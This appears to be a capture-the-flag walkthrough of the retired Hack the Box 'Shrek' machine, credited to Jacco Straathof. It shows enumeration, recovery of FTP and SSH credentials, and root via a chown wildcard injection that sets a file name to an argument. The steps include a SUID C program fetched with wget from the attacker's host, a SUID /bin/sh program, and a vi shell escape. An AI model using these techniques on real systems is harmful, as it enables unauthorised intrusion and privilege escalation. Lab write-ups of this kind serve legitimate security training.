HTB – Shrek

Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing. Shrek is retried vulnerable lab presented by Hack the Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sV 10.10.10.47
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-25 13:46 W. Europe Standard Time
Nmap scan report for 10.10.10.47
Host is up (0.028s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.27 ((Unix))
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds

As we know from the nmap scan that the target machine is running HTTP on port 80, we open the Ip in our browser.

We don’t find anything on the home page, so we use dirb to enumerate the directories.

dirb http://10.10.10.47

dirb scan shows a directory called uploads. We open uploads/ directory and find a file called secret_ultimate.php.

Now we use wget to download the file into our system.

wget http://10.10.10.47/uploads/secret_ultimate.php

We open secret_ultimate.php and find a path to a directory called secret_area_51.

We open it in our browser and find an audio file in that directory.

We download into our system and use an online site called academo.org to analyse the spectrum, we find a hint to log in through FTP using username donkey.

Further analysis of the audio file gives us the password to the username.

We login through FTP using the credentials we find in the audio file. After logging in we find a few text files and a file simply called key.

We download the key and all the test files we use mget to mass-download the txt files.

On our system as we can see all the files have been downloaded.

We open the files one by one and in the highlighted file above we found a base64 encoded string that was differentiated by space.

UHJpbmNlQ2hhcm1pbmc=

We decode the first base64 encoded string using base64decode and find the decoded string to be ‘PrinceCharming’

In another file, we find a base64 encoded string similarly differentiated by space.

J1x4MDFceGQzXHhlMVx4ZjJceDE3VCBceGQwXHg4YVx4ZDZceGUyXHhiZFx4OWVceDllflAoXHhmN1x4ZTlceGE1XHhjMUtUXHg5YUlceGRkXFwhXHg5NXRceGUxXHhkNnBceGFhInUyXHhjMlx4ODVGXHgxZVx4YmNceDAwXHhiOVx4MTdceDk3XHhiOFx4MGJceGM1eVx4ZWM8Sy1ncDlceGEwXHhjYlx4YWNceDlldFx4ODl6XHgxM1x4MTVceDk0RG5ceGViXHg5NVx4MTlbXHg4MFx4ZjFceGE4LFx4ODJHYFx4ZWVceGU4Q1x4YzFceDE1XHhhMX5UXHgwN1x4Y2N7XHhiZFx4ZGFceGYwXHg5ZVx4MWJoXCdRVVx4ZTdceDE2M1x4ZDRGXHhjY1x4YzVceDk5dyc=

We decode the base64 encoded string and find a hexadecimal encoded string.

'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec<K-gp9\xa0\xcb\xac\x9et\x89z\x13\x15\x94Dn\xeb\x95\x19[\x80\xf1\xa8,\x82G`\xee\xe8C\xc1\x15\xa1~T\x07\xcc{\xbd\xda\xf0\x9e\x1bh\'QU\xe7\x163\xd4F\xcc\xc5\x99w'

We use python to decode the hexadecimal string. We use secure module and use ‘PrinceCharming’ as key to decode the string and find the ssh username and passphrase for the key

root@kali:~# pip install secure
root@kali:~# python
Python 2.7.15+ (default, Aug 31 2018, 11:56:52) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import seccure
>>> string ="hexadecimal string"
>>> print seccure.decrypt(string, "PrinceCharming")
The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec

We open the key file and find that is a rsa key for ssh.

After setting the permissions of key to 600 we use this rsa key to log in . We use the username as sec as we found earlier and use the passphrase we found before to log in. As we log in we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.

Going through the directories we find a file called thoughts.txt

# sudo -l
# sudo -u farquad /usr/bin/vi
in vi -> :!/bin/bash
# find / -type f -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null

Privilege Escalation
Exploit:

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt The /usr/src​ folder is writeable for the sec ​user and contains a thoughts.txt​ file owned by root.
Attempting to create a file will reveal (after a bit of a delay) that there is a scheduled task which runs chown *​ in the directory. Using the above exploit, it is possible to force chown to use a reference file and apply the owner:group of that file to everything in the directory. The command
touch — –reference=thoughts.txt ​will create a file, with the name being passed as an argument to chown when it runs.
After that is configured, it is possible to create a binary and set its SUID bit. After the task runs and chowns the binary, it is possible to execute code as root.

Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
system("cat /root/root.txt > /usr/puckieflag.txt" );
return 0;
}

We now download the file into the target system using wget.

wget http://10.10.14.19/puckie.c
[sec@shrek src]$ gcc puckie.c -o puckie
[sec@shrek src]$ chmod +s puckie
[root@shrek root]# cat chown
#!/usr/bin/python
from subprocess import run, PIPE, DEVNULL
find = run(["/usr/bin/find", "/usr/src", "-perm", "-4000"], stdout=PIPE, stderr=DEVNULL, encoding="utf-8").stdout.split('\n')[:-1]
chown = run(["cd /usr/src; /usr/bin/chown nobody:nobody *"], stderr=DEVNULL, shell=True)
for suid in find:
chmod = run(["/usr/bin/chmod", "+s", suid],stderr=DEVNULL)
[root@shrek root]#
As soon as it changes the user and group of the file we run it and find the final flag.
[sec@shrek src]$ ls -la
total 24
drwxr-xr-x 2 sec root 4096 Nov 28 19:42 .
drwxr-xr-x 8 sec root 4096 Nov 28 19:38 ..
-rwsr-sr-x 1 sec users 8496 Nov 28 19:42 puckie
-rw-r--r-- 1 sec users 0 Nov 28 19:28 '--reference=thoughts.txt'
-rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
[sec@shrek usr]$ cat /usr/puckieflag.txt 
54d....178

Extra notes:

vi setuid.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
setreuid(0, 0);
execve("/bin/sh", NULL, NULL);
}

vi cut&paste above from clipboard
:set paste
dd
:wq!

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *